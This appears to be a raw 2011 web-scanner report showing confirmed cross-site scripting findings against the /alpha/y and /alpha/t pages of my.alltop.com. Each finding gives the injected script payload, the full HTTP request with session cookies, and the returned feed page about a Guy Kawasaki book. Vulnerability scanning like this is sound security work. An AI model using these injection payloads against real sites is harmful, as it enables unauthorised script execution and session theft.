Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:06 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com,alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:07 GMT; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:07 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24498


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>MyAlltop - alpha</title> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <meta name="description" content="Alltop presents all the top stories from alpha websites. Think of Alltop as an online magazine rack." /> <meta name="keywords" content="" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <link rel="apple-touch-icon" href="/apple-touch-icon.png" /> <link rel="alternate" type="application/rss+xml" href="http://my.alltop.com/alpha/rss" /> <meta name="author" content="electricpulp.com" /> <meta name="robots" content="noindex, nofollow" /> <link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" charset="utf-8" /> <link rel="stylesheet" href="/css/iphone.css" type="text/css" media="only screen and (max-device-width: 480px)" /> <link rel="stylesheet" href="/css/ipad.css" type="text/css" media="only screen and (max-device-width: 1024px)" /> <!--[if IE 6]> <link rel="stylesheet" href="/css/ie_style.css" type="text/css" media="screen" charset="utf-8" /><![endif]--> <!-- Behaviors --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js" charset="utf-8"></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop-clean.js" charset="utf-8"></script> <script type="text/javascript" charset="utf-8"><!--// <![CDATA[ var resultsSlider; var load_method = (window.ie ? 'load' : 'domready'); window.addEvent(load_method, function(){ resultsSlider = new Fx.Slide('results', {duration: 500}); resultsSlider.hide(); }); var skip_nav = true; // ]]> --></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop.js" charset="utf-8"></script> <style type="text/css"> .add-feed { display:none; } </style> <!-- Analytics --> <script type="text/javascript"> window.google_analytics_uacct = "UA-1701157-4"; </script> <!-- Ads --> <script type='text/javascript'><!--// <![CDATA[ var OA_source = 'test'; var OA_zones = { 'leaderboard' : 70, 'slot_3_1' : 2, 'slot_3_2' : 3, 'slot_3_300_250' : 66, 'slot_9_300_250' : 69, 'slot_6_1' : 59, 'slot_6_2' : 60, 'slot_9_1' : 57, 'slot_9_2' : 58, 'slot_3' : 24, 'slot_6' : 4, 'slot_9' : 49 } // ]]> --></script> <script type='text/javascript' src='http://at-adserver.alltop.com/openx/www/delivery/spcjs.php?id=1&amp;target=_blank'></script> <!-- Typography --> <script type="text/javascript" src="/scripts/sifr/sifr.js"></script> <script type="text/javascript" src="/scripts/sifr/sifr-config.js"></script></head><body><script type='text/javascript'><!--// <![CDATA[OA_show('top_script');// ]]> --></script> <div id="opener"> <a href="http://alltop.com/" id="logo">Alltop</a> <div id="leaderboard"> <script type='text/javascript'><!--// <![CDATA[ OA_show('leaderboard'); // ]]> --></script> </div></div> <div id="wrap-discover"> <div id="discover" class="clearfix"> <div id="discover-by-cat"> <ul id="categories"> <li><a href="/topic/work" rel="1">Work</a></li><li><a href="/topic/health" rel="2">Health</a></li><li><a href="/topic/culture" rel="3">Culture</a></li><li><a href="/topic/interests" rel="4">Interests</a></li><li><a href="/topic/tech" rel="5">Tech</a></li><li><a href="/topic/people" rel="6">People</a></li><li><a href="/topic/good" rel="7">Good</a></li><li><a href="/topic/news" rel="8">News</a></li><li><a href="/topic/geos" rel="9">Geos</a></li><li><a href="/topic/sports" rel="10">Sports</a></li> </ul> </div> <div id="discover-alpha"> <ul id="alpha"> <li><a href="/alpha/a" rel="A">A</a></li><li><a href="/alpha/b" rel="B">B</a></li><li><a href="/alpha/c" rel="C">C</a></li><li><a href="/alpha/d" rel="D">D</a></li><li><a href="/alpha/e" rel="E">E</a></li><li><a href="/alpha/f" rel="F">F</a></li><li><a href="/alpha/g" rel="G">G</a></li><li><a href="/alpha/h" rel="H">H</a></li><li><a href="/alpha/i" rel="I">I</a></li><li><a href="/alpha/j" rel="J">J</a></li><li><a href="/alpha/k" rel="K">K</a></li><li><a href="/alpha/l" rel="L">L</a></li><li><a href="/alpha/m" rel="M">M</a></li><li><a href="/alpha/n" rel="N">N</a></li><li><a href="/alpha/o" rel="O">O</a></li><li><a href="/alpha/p" rel="P">P</a></li><li><a href="/alpha/q" rel="Q">Q</a></li><li><a href="/alpha/r" rel="R">R</a></li><li><a href="/alpha/s" rel="S">S</a></li><li><a href="/alpha/t" rel="T">T</a></li><li><a href="/alpha/u" rel="U">U</a></li><li><a href="/alpha/v" rel="V">V</a></li><li><a href="/alpha/w" rel="W">W</a></li><li><a href="/alpha/x" rel="X">X</a></li><li><a href="/alpha/y" rel="Y">Y</a></li><li><a href="/alpha/z" rel="Z">Z</a></li><li><a href="/alpha/#" rel="#">#</a></li> </ul> </div> </div> </div> <div id="wrap-search"> <div id="search" class="clearfix"> <ul id="navigation" class="tabs"> <li><a href="http://alltop.com/" class="hot-topics">Hot Topics</a></li> <li><a href="http://alltop.com/?new_topics=true" class="new-topics">New Topics</a></li> <li><a href="http://alltop.com/?recent_topics=true" class="my-recent-topics">My Recent Topics</a></li> <li class="here"><a href="http://my.alltop.com/" class="myalltop">MyAlltop</a></li> <li><a href="http://holykaw.alltop.com/" class="holykaw">HolyKaw</a></li> </ul> <div id="search-box"> <form action="/" method="get" id="search-form"> <input type="text" name="keywords" value="" id="key-words" /> <input type="image" src="/img/search-bttn.gif" id="bttn-search" /> </form> </div> </div> </div> <div id="wrap-results"> <div id="slide-results"> <div id="results" class="clearfix" style="visibility:hidden;"> </div> </div></div><div id="headlines" class="hfeed clearfix"> <h1 id="pagetitle" class="din"> Selected by alpha </h1> <ul id="top-five" class="feed-block"> <li class="site"> <h2>Most Topular Stories</h2> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3> <div class="full-post"> <div class="site-title">Holy Kaw!</div> <div class="published">8 Mar 2011 | 7:31 am</div> <div class="entry-content"> <div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div> </div> </div> </li> </ul> <ul id="feed832131" class="feed-block 451b505be509cf8fb081d3e256f160a6"> <li class="site"><div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div><h2><a href="http://holykaw.alltop.com" target="_blank" class="snap_shots">Holy Kaw!</a></h2></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3><div class="full-post"><div class="published">8 Mar 2011 | 7:31 am</div><div class="entry-content"><div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/how-great-are-you-take-the-quiz" rel="bookmark" target="_blank">How GREAT are you? Take the quiz.</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 10:24 pm</div><div class="entry-content"><div class="entry-bound">How many books offer a quiz to help potential readers determine if they should trot down to the bookstore (or e-reader) and pick it up? Yeah, this isn&rsquo;t your average book following the same old rules. Enchantment: The Art of Changing Hearts, Minds, and Actions explores how to successfully exert influence without looking like an idiot or compromising ethical standards. So while you might think of yourself as the most enchanting feller on the block, the &ldquo;How GREAT are you?&rdquo; quiz will offer a definitive answer. The greatness score will determine how enchanting you are (and how&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/thanks-merci-mahalo-to-the-enchantment-team-v" rel="bookmark" target="_blank">Thanks, Merci, Mahalo to the Enchantment Team (video)</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 7:00 pm</div><div class="entry-content"><div class="entry-bound">If you think that creating a book is a solitary activity involving windswept beaches and fountain pens, you&rsquo;re hallucinating. Writing is a difficult and painful process. It also takes many people to complete the process of finishing a book: editors (content and copy), publicists, designers, assistants, production people, artists, photographers, beta testers, programmers, website designers, and origamists. By my count, close to one hundred people helped me write, finish, and market this book. My friends, Brad Jefferson and Andrew Jacobson, at Animoto created this awesome video so that&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/like-the-enchantment-fan-page-for-exclusive-g" rel="bookmark" target="_blank">Like the Enchantment Fan page for exclusive goodies</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 6:14 pm</div><div class="entry-content"><div class="entry-bound">A wise sage once said: Eat like a bird, poop like an elephant, and enchant like Guy Kawasaki. Now that Guy's new book Enchantment hits shelves March 8, keep up with quick tips, instructive videos, and funny stories from the author on the Enchantment Facebook fan page.&nbsp; In addition to the inside track on the art of Enchantment, like the fan page and find: A free download of Guy's first book, The Macintosh Way. Guy's Realistic Enchantment Aptitude Test. A photo context with prizes that include and iPad and five Nikon D3100s. Embeddable videos. &nbsp; Interesting stories, funny pictures,&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/introducing-the-enchantment-badges-and-wallpa" rel="bookmark" target="_blank">Introducing the Enchantment badges and wallpapers</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 5:45 pm</div><div class="entry-content"><div class="entry-bound">Here&rsquo;s an easy way to bring a smile to Guy&rsquo;s face: Slap one of these new Enchantment badges onto your blog or personal website, and let the world know that you&rsquo;re out to get it. Or do a little spring cleaning and set one of the elegant Enchantment wallpapers as your desktop&mdash;a reminder that everyday is for the enchanting. Watch out, universe: Resistance is futile. Enchanters, let's hear you roar. Get your badges and wallpaper today. (Did you setup your badge or desktop?&nbsp;Share it on the Enchantment Facebook fan page.) Please click here to buy Enchantment now.</div></div></div></li></ul></div><div id="footer" class="clearfix"> <p class="copyright">&copy; 2011 Nononina, Inc. All Rights Reserved</p> <p class="navigation"> <a href="http://alltop.com/about/">About</a> &middot; <a href="http://alltop.com/advertising/">Advertising</a> &middot; <a href="http://alltop.com/submission/">Submissions</a> &middot; <a href="http://alltop.com/contact-us/">Contact Us</a> &middot; <a href="http://blog.alltop.com/">Blog</a> &middot; <a href="http://alltop.com/goodies/">Goodies</a> &middot; <a href="http://alltop.com/legal/" rel="nofollow">Legal</a> </p> <p class="site-credits">Powered by <a href="http://rackspace.com">a Rackspace Dedicated Server</a> &middot; Inspired by <a href="http://popurls.com">popurls</a> &middot; Site by <a href="http://electricpulp.com" rel="cool">Electric Pulp</a> </p></div><script type="text/javascript" charset="utf-8">

function signup_form_submit() {
var f = $('the-signup-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-signup-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('sign-up-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: function(){
..
- /alpha/y

/alpha/y CONFIRMED

http://my.alltop.com/alpha/y?'"--></style></script><script>alert(0x00020C)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x00020C)</script>

Request

GET /alpha/y?'"--></style></script><script>netsparker(0x00020C)</script> HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
Cookie: alltop_v=715bc9136ec18fde687f237cb61a1ab8; EPClientLogin=7ec7288512668ca75b58f5b1befbab70; myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 08 Mar 2011 20:50:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: EPClientLogin=7ec7288512668ca75b58f5b1befbab70; expires=Wed, 07-Mar-2012 20:50:06 GMT; path=/; domain=.alltop.com,myAlltopSession=slsset6bn1ifrsqdg7nm8hsl12; path=/; domain=.alltop.com,alltop_r=ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_68540_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID_ALLTOP_TOPIC_ID; expires=Mon, 06-Jun-2011 20:50:09 GMT; path=/; domain=.alltop.com
Expires: Tue, 08 Mar 2011 21:50:09 GMT
Cache-Control: private, max-age=10800, pre-check=10800
Last-Modified: Tue, 26 Oct 2010 18:16:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24498


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>MyAlltop - alpha</title> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <meta name="description" content="Alltop presents all the top stories from alpha websites. Think of Alltop as an online magazine rack." /> <meta name="keywords" content="" /> <link rel="icon" href="/favicon.ico" type="image/x-icon" /> <meta http-equiv="Content-type" content="text/html; charset=UTF-8" /> <link rel="apple-touch-icon" href="/apple-touch-icon.png" /> <link rel="alternate" type="application/rss+xml" href="http://my.alltop.com/alpha/rss" /> <meta name="author" content="electricpulp.com" /> <meta name="robots" content="noindex, nofollow" /> <link rel="stylesheet" href="/css/style.css" type="text/css" media="screen" charset="utf-8" /> <link rel="stylesheet" href="/css/iphone.css" type="text/css" media="only screen and (max-device-width: 480px)" /> <link rel="stylesheet" href="/css/ipad.css" type="text/css" media="only screen and (max-device-width: 1024px)" /> <!--[if IE 6]> <link rel="stylesheet" href="/css/ie_style.css" type="text/css" media="screen" charset="utf-8" /><![endif]--> <!-- Behaviors --> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/mootools/1.11/mootools-yui-compressed.js" charset="utf-8"></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop-clean.js" charset="utf-8"></script> <script type="text/javascript" charset="utf-8"><!--// <![CDATA[ var resultsSlider; var load_method = (window.ie ? 'load' : 'domready'); window.addEvent(load_method, function(){ resultsSlider = new Fx.Slide('results', {duration: 500}); resultsSlider.hide(); }); var skip_nav = true; // ]]> --></script> <script type="text/javascript" src="http://alltop.com/scripts/alltop.js" charset="utf-8"></script> <style type="text/css"> .add-feed { display:none; } </style> <!-- Analytics --> <script type="text/javascript"> window.google_analytics_uacct = "UA-1701157-4"; </script> <!-- Ads --> <script type='text/javascript'><!--// <![CDATA[ var OA_source = 'test'; var OA_zones = { 'leaderboard' : 70, 'slot_3_1' : 2, 'slot_3_2' : 3, 'slot_3_300_250' : 66, 'slot_9_300_250' : 69, 'slot_6_1' : 59, 'slot_6_2' : 60, 'slot_9_1' : 57, 'slot_9_2' : 58, 'slot_3' : 24, 'slot_6' : 4, 'slot_9' : 49 } // ]]> --></script> <script type='text/javascript' src='http://at-adserver.alltop.com/openx/www/delivery/spcjs.php?id=1&amp;target=_blank'></script> <!-- Typography --> <script type="text/javascript" src="/scripts/sifr/sifr.js"></script> <script type="text/javascript" src="/scripts/sifr/sifr-config.js"></script></head><body><script type='text/javascript'><!--// <![CDATA[OA_show('top_script');// ]]> --></script> <div id="opener"> <a href="http://alltop.com/" id="logo">Alltop</a> <div id="leaderboard"> <script type='text/javascript'><!--// <![CDATA[ OA_show('leaderboard'); // ]]> --></script> </div></div> <div id="wrap-discover"> <div id="discover" class="clearfix"> <div id="discover-by-cat"> <ul id="categories"> <li><a href="/topic/work" rel="1">Work</a></li><li><a href="/topic/health" rel="2">Health</a></li><li><a href="/topic/culture" rel="3">Culture</a></li><li><a href="/topic/interests" rel="4">Interests</a></li><li><a href="/topic/tech" rel="5">Tech</a></li><li><a href="/topic/people" rel="6">People</a></li><li><a href="/topic/good" rel="7">Good</a></li><li><a href="/topic/news" rel="8">News</a></li><li><a href="/topic/geos" rel="9">Geos</a></li><li><a href="/topic/sports" rel="10">Sports</a></li> </ul> </div> <div id="discover-alpha"> <ul id="alpha"> <li><a href="/alpha/a" rel="A">A</a></li><li><a href="/alpha/b" rel="B">B</a></li><li><a href="/alpha/c" rel="C">C</a></li><li><a href="/alpha/d" rel="D">D</a></li><li><a href="/alpha/e" rel="E">E</a></li><li><a href="/alpha/f" rel="F">F</a></li><li><a href="/alpha/g" rel="G">G</a></li><li><a href="/alpha/h" rel="H">H</a></li><li><a href="/alpha/i" rel="I">I</a></li><li><a href="/alpha/j" rel="J">J</a></li><li><a href="/alpha/k" rel="K">K</a></li><li><a href="/alpha/l" rel="L">L</a></li><li><a href="/alpha/m" rel="M">M</a></li><li><a href="/alpha/n" rel="N">N</a></li><li><a href="/alpha/o" rel="O">O</a></li><li><a href="/alpha/p" rel="P">P</a></li><li><a href="/alpha/q" rel="Q">Q</a></li><li><a href="/alpha/r" rel="R">R</a></li><li><a href="/alpha/s" rel="S">S</a></li><li><a href="/alpha/t" rel="T">T</a></li><li><a href="/alpha/u" rel="U">U</a></li><li><a href="/alpha/v" rel="V">V</a></li><li><a href="/alpha/w" rel="W">W</a></li><li><a href="/alpha/x" rel="X">X</a></li><li><a href="/alpha/y" rel="Y">Y</a></li><li><a href="/alpha/z" rel="Z">Z</a></li><li><a href="/alpha/#" rel="#">#</a></li> </ul> </div> </div> </div> <div id="wrap-search"> <div id="search" class="clearfix"> <ul id="navigation" class="tabs"> <li><a href="http://alltop.com/" class="hot-topics">Hot Topics</a></li> <li><a href="http://alltop.com/?new_topics=true" class="new-topics">New Topics</a></li> <li><a href="http://alltop.com/?recent_topics=true" class="my-recent-topics">My Recent Topics</a></li> <li class="here"><a href="http://my.alltop.com/" class="myalltop">MyAlltop</a></li> <li><a href="http://holykaw.alltop.com/" class="holykaw">HolyKaw</a></li> </ul> <div id="search-box"> <form action="/" method="get" id="search-form"> <input type="text" name="keywords" value="" id="key-words" /> <input type="image" src="/img/search-bttn.gif" id="bttn-search" /> </form> </div> </div> </div> <div id="wrap-results"> <div id="slide-results"> <div id="results" class="clearfix" style="visibility:hidden;"> </div> </div></div><div id="headlines" class="hfeed clearfix"> <h1 id="pagetitle" class="din"> Selected by alpha </h1> <ul id="top-five" class="feed-block"> <li class="site"> <h2>Most Topular Stories</h2> </li> <li class="hentry"> <h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3> <div class="full-post"> <div class="site-title">Holy Kaw!</div> <div class="published">8 Mar 2011 | 7:31 am</div> <div class="entry-content"> <div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div> </div> </div> </li> </ul> <ul id="feed832131" class="feed-block 451b505be509cf8fb081d3e256f160a6"> <li class="site"><div class="add-feed"><img src="/images/added-my.gif" alt="added to my.Alltop" class="added-feed-my" style="display:none" /><a href="#" class="add-feed-my" title="add this feed to my.Alltop"><img src="/images/add-my.gif" alt="add this feed to my.Alltop" /></a></div><h2><a href="http://holykaw.alltop.com" target="_blank" class="snap_shots">Holy Kaw!</a></h2></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/kirkus-calls-guy-a-modern-day-dale-carnegie" rel="bookmark" target="_blank">Kirkus calls Guy a “modern-day Dale Carnegie”</a></h3><div class="full-post"><div class="published">8 Mar 2011 | 7:31 am</div><div class="entry-content"><div class="entry-bound">The publishing industry considers Kirkus one of the toughest reviewers. You&rsquo;ll seldom see a really positive one from the organization, so it was a big deal to get this review: Apple&rsquo;s former chief evangelist leads businessfolk down the path to enchantment. The entrepreneur&rsquo;s entrepreneur is back with his ninth book, this time tackling the tricky art of influence and persuasion. Kawasaki (Reality Check: The Irreverent Guide to Outsmarting, Outmanaging and Outmarketing Your Competition, 2011, etc.) transforms the otherwise exhausted and overwrought tropes of how to win friends&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/how-great-are-you-take-the-quiz" rel="bookmark" target="_blank">How GREAT are you? Take the quiz.</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 10:24 pm</div><div class="entry-content"><div class="entry-bound">How many books offer a quiz to help potential readers determine if they should trot down to the bookstore (or e-reader) and pick it up? Yeah, this isn&rsquo;t your average book following the same old rules. Enchantment: The Art of Changing Hearts, Minds, and Actions explores how to successfully exert influence without looking like an idiot or compromising ethical standards. So while you might think of yourself as the most enchanting feller on the block, the &ldquo;How GREAT are you?&rdquo; quiz will offer a definitive answer. The greatness score will determine how enchanting you are (and how&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/thanks-merci-mahalo-to-the-enchantment-team-v" rel="bookmark" target="_blank">Thanks, Merci, Mahalo to the Enchantment Team (video)</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 7:00 pm</div><div class="entry-content"><div class="entry-bound">If you think that creating a book is a solitary activity involving windswept beaches and fountain pens, you&rsquo;re hallucinating. Writing is a difficult and painful process. It also takes many people to complete the process of finishing a book: editors (content and copy), publicists, designers, assistants, production people, artists, photographers, beta testers, programmers, website designers, and origamists. By my count, close to one hundred people helped me write, finish, and market this book. My friends, Brad Jefferson and Andrew Jacobson, at Animoto created this awesome video so that&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/like-the-enchantment-fan-page-for-exclusive-g" rel="bookmark" target="_blank">Like the Enchantment Fan page for exclusive goodies</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 6:14 pm</div><div class="entry-content"><div class="entry-bound">A wise sage once said: Eat like a bird, poop like an elephant, and enchant like Guy Kawasaki. Now that Guy's new book Enchantment hits shelves March 8, keep up with quick tips, instructive videos, and funny stories from the author on the Enchantment Facebook fan page.&nbsp; In addition to the inside track on the art of Enchantment, like the fan page and find: A free download of Guy's first book, The Macintosh Way. Guy's Realistic Enchantment Aptitude Test. A photo context with prizes that include and iPad and five Nikon D3100s. Embeddable videos. &nbsp; Interesting stories, funny pictures,&hellip;</div></div></div></li><li class="hentry"><h3 class="entry-title"><a href="http://holykaw.alltop.com/introducing-the-enchantment-badges-and-wallpa" rel="bookmark" target="_blank">Introducing the Enchantment badges and wallpapers</a></h3><div class="full-post"><div class="published">7 Mar 2011 | 5:45 pm</div><div class="entry-content"><div class="entry-bound">Here&rsquo;s an easy way to bring a smile to Guy&rsquo;s face: Slap one of these new Enchantment badges onto your blog or personal website, and let the world know that you&rsquo;re out to get it. Or do a little spring cleaning and set one of the elegant Enchantment wallpapers as your desktop&mdash;a reminder that everyday is for the enchanting. Watch out, universe: Resistance is futile. Enchanters, let's hear you roar. Get your badges and wallpaper today. (Did you setup your badge or desktop?&nbsp;Share it on the Enchantment Facebook fan page.) Please click here to buy Enchantment now.</div></div></div></li></ul></div><div id="footer" class="clearfix"> <p class="copyright">&copy; 2011 Nononina, Inc. All Rights Reserved</p> <p class="navigation"> <a href="http://alltop.com/about/">About</a> &middot; <a href="http://alltop.com/advertising/">Advertising</a> &middot; <a href="http://alltop.com/submission/">Submissions</a> &middot; <a href="http://alltop.com/contact-us/">Contact Us</a> &middot; <a href="http://blog.alltop.com/">Blog</a> &middot; <a href="http://alltop.com/goodies/">Goodies</a> &middot; <a href="http://alltop.com/legal/" rel="nofollow">Legal</a> </p> <p class="site-credits">Powered by <a href="http://rackspace.com">a Rackspace Dedicated Server</a> &middot; Inspired by <a href="http://popurls.com">popurls</a> &middot; Site by <a href="http://electricpulp.com" rel="cool">Electric Pulp</a> </p></div><script type="text/javascript" charset="utf-8">

function signup_form_submit() {
var f = $('the-signup-form');
f.ajax.value=1;
new Ajax(f.action, {
method: 'post',
data: $('the-signup-form'),
onRequest: function(){
},
onComplete: function(response){
if (response==0) {
$('sign-up-form-html').effect('opacity', {
duration: 500,
fps: 75,
onComplete: function(){
..
- /alpha/t

/alpha/t CONFIRMED

http://my.alltop.com/alpha/t?'"--></style></script><script>alert(0x000222)</script>

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000222)</script>

Request

GET /alpha/t?'"--></style></script><script>netsparker(0x000222)</script> HTTP/1.1
Referer: http://my.alltop.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: my.alltop.com
